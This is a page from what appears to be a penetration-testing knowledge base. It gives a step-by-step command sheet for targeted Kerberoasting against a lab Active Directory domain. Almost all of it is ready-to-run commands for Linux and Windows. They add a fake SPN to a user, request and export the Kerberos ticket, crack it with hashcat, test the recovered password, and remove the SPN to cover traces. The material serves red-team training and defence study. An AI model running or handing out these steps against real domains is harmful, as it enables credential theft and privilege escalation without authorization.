Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 03. Kerberos / Roasting / Kerberoasting

Targeted Kerberoasting

Targeted Kerberoasting is used when we can write to a user object's servicePrincipalName attribute. We temporarily add an SPN to the target user, request a TGS for that new SPN, crack the ticket offline, and remove the SPN.

Confirm write access

bloodyAD --host 10.10.10.200 -d ootw.local -u student -p 'student' get object target.user --attr nTSecurityDescriptor

Linux automated targeted roast

python3 targetedKerberoast.py -vv -d ootw.local -u student -p 'student' --request-user target.user --dc-ip 10.10.10.200

Linux manual add SPN

bloodyAD --host 10.10.10.200 -d ootw.local -u student -p 'student' set object target.user servicePrincipalName -v nonexistent/target
GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200 -request-user target.user -outputfile target.hash
bloodyAD --host 10.10.10.200 -d ootw.local -u student -p 'student' remove object target.user servicePrincipalName -v nonexistent/target

Windows manual add SPN

Set-DomainObject -Identity target.user -Set @{serviceprincipalname='nonexistent/target'} -Verbose
Get-DomainSPNTicket -SPN 'nonexistent/target' -OutputFormat Hashcat
Set-DomainObject -Identity target.user -Clear serviceprincipalname -Verbose

Windows with credentials

$SecPassword = ConvertTo-SecureString 'student' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('ootw.local\student', $SecPassword)
Set-DomainObject -Credential $Cred -Identity target.user -Set @{serviceprincipalname='nonexistent/target'} -Verbose
Get-DomainSPNTicket -Credential $Cred -SPN 'nonexistent/target' -OutputFormat Hashcat
Set-DomainObject -Credential $Cred -Identity target.user -Clear serviceprincipalname -Verbose

Crack

hashcat -m 13100 target.hash /usr/share/wordlists/rockyou.txt -r rules/best64.rule -O -w 3
hashcat -m 13100 target.hash /usr/share/wordlists/rockyou.txt --show

Validate

nxc smb 10.10.10.200 -u target.user -p '<CRACKED_PASSWORD>' -d ootw.local
nxc ldap 10.10.10.200 -u target.user -p '<CRACKED_PASSWORD>' -d ootw.local

Cleanup verification

Get-DomainUser target.user -Properties serviceprincipalname

Notes

This attack depends on object write rights, not on the target already being a service account. The common paths are GenericAll, GenericWrite, WriteProperty, WriteSPN, or delegated write access over servicePrincipalName.

Always remove the SPN after the request. The valuable artifact is the offline hash, not the modified directory object.